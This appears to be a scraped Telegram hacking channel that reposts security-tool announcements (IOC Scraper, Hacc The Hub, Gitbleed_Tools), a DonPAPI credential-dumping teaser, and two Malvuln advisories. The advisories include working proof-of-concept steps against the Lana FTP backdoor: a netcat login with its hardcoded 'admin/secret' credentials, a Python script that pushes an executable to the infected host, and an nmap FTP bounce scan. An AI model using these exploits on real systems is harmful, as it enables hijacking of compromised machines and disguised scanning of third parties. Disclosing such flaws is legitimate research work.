Hacking Articles Tips Tricks Videos Tutorials
467 subscribers
65.7K photos
15 videos
157 files
131K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Hacking Articles Tips Tricks Videos Tutorials
Photo
Kali Linux Tutorials
IOC Scraper : A Fast And Reliable Service That Enables You To Extract IOCs

IOC Scraper utilises IOCPARSER service to fetch IOCs from different vendor Blogs, PDFs, and CSV files. Parsing IOCs is time-consuming process, using current script one can automatically extract and aggregate IOCs easily.

Features

* Defanged IOCs : Supports extracting and defanging IOCs.
* Whitelist IOCs : Supports custom whitlisting of IOCs.
* Source Types : Supports variety of sources such as Blogs, PDFs, CSV, and much more.

Supported IOC Types

IOC Scraper supports a variety of IOC types.
IOC TYPESTATUSASNSupportedIPv4, IPv6SupportedURL, DomainSupportedEmailSupportedMD5, SHA1, SHA256, File NameSupportedMAC AddressSupportedMITRE ATT&CK IDsSupportedYARA RulesSupported
Installation

git clone https://www.github.com/chaitanyakrishna/iocscraper.git
pip3 install -f requirements.txt

Usage

python IOC_Scraper.py -h
_
| / \ / | / | _ _ _ _ _ _
| | | | | | ___ \ / | ‘/ ` | ‘ \ / _ \ ‘| | | || | | ) | (| | | (| | |) | / |
|___/ ____| |_/ _|| __,| ./ _||
|_|
usage: IOC_Scraper.py [-h] [-u URL] [-uL FILE_CONTAINING_URLS] [-t TIMEOUT] [-th THREADNUMBER] -o OUTPUT
IOC_Scraper v1.0
Optional Arguments:
-h, –help show this help message and exit
-u URL, –url Single URL for Fetching IOCs
-uL FILE_CONTAINING_URLS, –url-list FILE_CONTAINING_URLS File Containing URL, One URL in One Line.
-t TIMEOUT, –timeout TIMEOUT HTTP Request Timeout. default=60
-th THREADNUMBER, –thread THREADNUMBER Parallel HTTP Request Number. default=100
Required Arguments:
-o OUTPUT, –output OUTPUT Output file name.

Sample command line arguments

python iocscraper.py -u “http://targeturl.com” -o report
python iocscraper.py -uL urls.txt -o report

Output

python IOC_Scraper.py -uL url_list.txt -o report
_ _
| / \ / | / | _ _ _ _ _ _
| | | | | | ___ \ / | ‘/ ` | ‘ \ / _ \ ‘| | | || | | ) | (| | | (| | |) | / |
|___/ ____| |_/ _|| __,| ./ _||
|_|
[Date: 20-01-2022] [Time: 23:03:09] [INFO] Initiating IOC Scraper …
[*] ProgressBar: 14/14 [Fethcing IOC from: thehackernews.com] [Errors: 0] … 0] … …
[Date: 20-01-2022] [Time: 23:03:13] [INFO] Removing Duplicates …
[Date: 20-01-2022] [Time: 23:03:13] [INFO] Fetched IOCs from the following domains
blog.aquasec.com
nationalcybersecurity.com
cofense.com
thehackernews.com
blog.sucuri.net
threats.amnpardaz.com
www.crowdstrike.com
www.bleepingcomputer.com
forensicitguy.github.io
marcusedmondson.com
rajhackingarticles.blogspot.com
research.checkpoint.com
www.reddit.com
www.zerofox.com
[Date: 20-01-2022] [Time: 23:03:13] [INFO] Indicator of Compromise Stats
Domain : 52
URL : 26
IPv4 : 15
IPv6 : 0
ASN : 0
FILE_HASH_MD5 : 24
FILE_HASH_SHA1 : 16
FILE_HASH_SHA256 : 3
MITRE_ATTACK : 4
EMAIL : 3
CVE : 7
FILE_NAME : 59
YARA_RULE : 0
MAC_ADDRESS : 0
[Date: 20-01-2022] [Time: 23:03:13] [INFO] Total IOCs: 209
Download

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Kali Linux Tutorials
Hacc The Hub : Open Source Self-Hosted Cyber Security Learning Platform

Hacc The Hub is an open source project that provides cyber security

The Hacc The Hub system consists of 3 main parts:

* Docker: containing all of the boxes creating the environment in which we’ll be learning on.
* The backend: controlling Docker and responsible for starting/destroying individual box in the system and managing the networking that joins them into a unified system.
* The frontend: GUI for the user to interact with the system via their web browser.

Built With

* Flask-RESTX
* Next.js

Getting Started

To get HaccTheHub up and running, you would need to setup the followings

Prerequisites

* Docker (refer to Docker’s Documentation for setup)
* Python 3 (Download) or just install python3from your package manager.
* Node.js 16 (Download) or use your package manager

Installation

* Clone the repo

git clone https://github.com/J4FSec/HaccTheHub.git

* Install dependencies for the backend

cd HaccTheHub/backend
python3 -m pip install -r requirements.txt

* And dependencies for the frontend

cd ../client
npm install

Usage

* Start up Docker
* Start the backend

cd ../backend
python3 main.py

And the frontend

cd ../client
npm start

The WebUI should now be accessible via http://localhost:8080.
Download

___________________________
@hacking_Attack
@Hacking_Video
DonPAPI — Dumping DPAPI Credz Remotely

Dumping revelant information on compromised targets without AV detection  DPAPI dumpingContinue reading on Medium »
Read more...
Hacking on Medium
Bitcoin hacklenebilir mi?

Bitcoin ve sonrasında ortaya çıkan kripto paraların yanı sıra, bu kripto paraların üzerinde oluşturulduğu blockchain teknolojisi gelecekte…

Continue reading on Medium »

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
KitPloit - PenTest Tools!
Gitbleed_Tools - For Extracting Data From Mirrorred Git Repositories

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfXojv97e3F5z3jN0rKeTF0yRQZfw5nTYUIpVGtvAbGSqFmL7UxKZ7Saq47O25ng2jN_4OdfPZpyKEVXL8XISCF2PuIrYgiSNJ7Ku6rn7UgL9nBbWxsa4IzDulai1FIiHH1mirAXJ0LWwfz7X9BIdMEwWcjiQUmX61UW4yZ5EgrzHEWNbzhy9qblmM/s16000/gitbleed_tools_1_gitbleed_icon.png This repo contains shell scripts that can be used to download and analyze differences between cloned and mirror Git repositories. For more information about the underlying quirk in Git behavior, please visit read our blog post. What Do These Scripts Do?These scripts will clone a copy of the given Git repository, both as regular clone and mirrored ("--mirror") option. It will then create a delta between the two, seeking to find the parts of the repository that are only available in mirror mode. Last, gitleaks will be run to see if any secrets are present in the delta portion, and "git log" will be used to create a single file containing the bodies of the commits so they can be analyzed easier.

Please note that since this script creates three copies of the repository, it may consume a lot of disk space. Example repositoriesYou can test these tools on the following two example repositories:

* gb_testrepo_delete - repository hiding secrets via deleted commits
* gb_testrepo_reset - repository hiding secrets via "git reset" RequirementsYou will need Git, Python 3. GitLeaks and git-filter-repo to be installed. Here is an example of installing these on MacOS: brew install git python3 gitleaks git-filter-repo How to Install and RunYou can run this againt a repository as follows: git clone https://github.com/nightwatchcybersecurity/gitbleed_tools.git
cd gitbleed_tools
./gitbleed.sh https://github.com/nightwatchcybersecurity/gitbleed_tools.git example
There are also some helper scripts that can be used to scan GitHub and GitLab repositories as follows: ./gitbleed_gh.sh nightwatchcybersecurity/gitbleed_tools
./gitbleed_gl.sh nwcs/junit_ui_bug
This will create an example folder containing three subfolders:

* clone - contains the cloned repository
* delta - contains the mirrrored repository minus all of the commits in the "clone"
* mirror - contains the mirrored repository cloned with the "--mirror" option

There are also three files created:

* clone_hashes.done.txt - list of hashes in the cloned repository
* gitleaks.json - results from running gitleaks
* gitlog.txt - all commits from the delta folder concatenated into a single file Development InformationReporting bugs and feature requestsPlease use the GitHub issue tracker to report issues or suggest features: https://github.com/nightwatchcybersecurity/gitbleed_tools

You can also send emai to research /at/ nightwatchcybersecurity [dot] com Wishlist* TBD Download Gitbleed_Tools

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Backdoor.Win32.FTP.Lana.01.d Hardcoded Credential

https://1.bp.blogspot.com/-f08tQl4ET7w/WWlvRxSI6FI/AAAAAAAAINU/PQjq5zhIC6AFgb3OPDnJIpwa9KgUsaunwCLcBGAs/s1600/h37.png
Backdoor.Win32.FTP.Lana.01.d malware suffers from a hardcoded credential vulnerability.

MD5 | ae7352e3b49777bfd29c50ab208e71f5

Download
Discovery / credits: Malvuln - malvuln.com (c) 2022
Original source: https://malvuln.com/advisory/ea9ab5983a6fa71e31907e74d4ddbab6.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.FTP.Lana.01.d
Vulnerability: Weak Hardcoded Credentials
Family: Lana
Type: PE32
MD5: ea9ab5983a6fa71e31907e74d4ddbab6
Vuln ID: MVID-2022-0539
Dropped files: sersvc32.exe
Disclosure: 04/06/2022
Description: The malware listens in TCP port 9003. The credentials "admin" and "secret" are weak and stored in plaintext with the executable.

00404004 aAdmin db 'admin',0 ; DATA XREF 00401FBF
00404004 ; sub_402765+4A3↑o
00404019 aSecret db 'secret',0 ; DATA XREF 00401FA8

Exploit/PoC:
nc64.exe x.x.x.x 9003
220 Silver FTP v1.1
USER admin
331 Password required for admin.
PASS secret
230 User logged in, proceed.
SYST
215 UNIX Type: L8
PASV
227 Entering Passive Mode (192,168,18,125,195,84).
STOR DOOM.exe
150 Data connection accepted.
226 Transfer ok

from socket import *

MALWARE_HOST="192.168.18.125"
PORT=50004
DOOM="DOOM.exe"

def doit():
s=socket(AF_INET, SOCK_STREAM)
s.connect((MALWARE_HOST, PORT))

f = open(DOOM, "rb")
EXE = f.read()
s.send(EXE)

while EXE:
s.send(EXE)
EXE=f.read()

s.close()

print("By Malvuln");

if __name__=="__main__":
doit()
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Backdoor.Win32.FTP.Lana.01.d Man-In-The-Middle

https://4.bp.blogspot.com/-qWHV3SrNBkU/WWlu99WsXjI/AAAAAAAAIJ4/a1ff3k5st1g65kjfNuwTJpgcbLEB4bHEACLcBGAs/s1600/h116.png
Backdoor.Win32.FTP.Lana.01.d malware suffers from a man-in-the-middle vulnerability.

MD5 | cfd103e5809e7ee490721bab25b13d09

Download
Discovery / credits: Malvuln - malvuln.com (c) 2022
Original source: https://malvuln.com/advisory/ea9ab5983a6fa71e31907e74d4ddbab6_B.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.FTP.Lana.01.d
Vulnerability: Port Bounce Scan
Description: The malware listens on TCP port 9003. Third-party intruders who successfully logon can abuse the backdoor FTP server as a man-in-the-middle machine allowing PORT Command bounce scan attacks using Nmap. This vulnerability allows remote attackers to abuse your system and discreetly conduct network port scanning. Victims will then think these scans are originating from the infected system running the afflicted malware FTP Server and not you.
Family: Lana
Type: PE32
MD5: ea9ab5983a6fa71e31907e74d4ddbab6
Vuln ID: MVID-2022-0540
Dropped files: sersvc32.exe
Disclosure: 04/06/2022

Exploit/PoC:
C:\>nmap -n -Pn -b admin:secret@192.168.18.125:9003 -p21,22,80 192.168.18.237 -v
Starting Nmap 7.80 ( https://nmap.org ) at 2022-04-04 14:30 UTC-11
Resolved FTP bounce attack proxy to 192.168.18.125 (192.168.18.125).
Attempting connection to ftp://admin:secret@192.168.18.125:9003
Connected:220 Silver FTP v1.1
Login credentials accepted by FTP server!
Initiating Bounce Scan at 14:30
Discovered open port 80/tcp on 192.168.18.237
Completed Bounce Scan at 14:30, 2.12s elapsed (3 total ports)
Nmap scan report for 192.168.18.237
Host is up.

PORT STATE SERVICE
21/tcp closed ftp
22/tcp closed ssh
80/tcp open http

Read data files from: C:\Program Files (x86)\Nmap
Nmap done: 1 IP address (1 host up) scanned in 11.23 seconds

Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video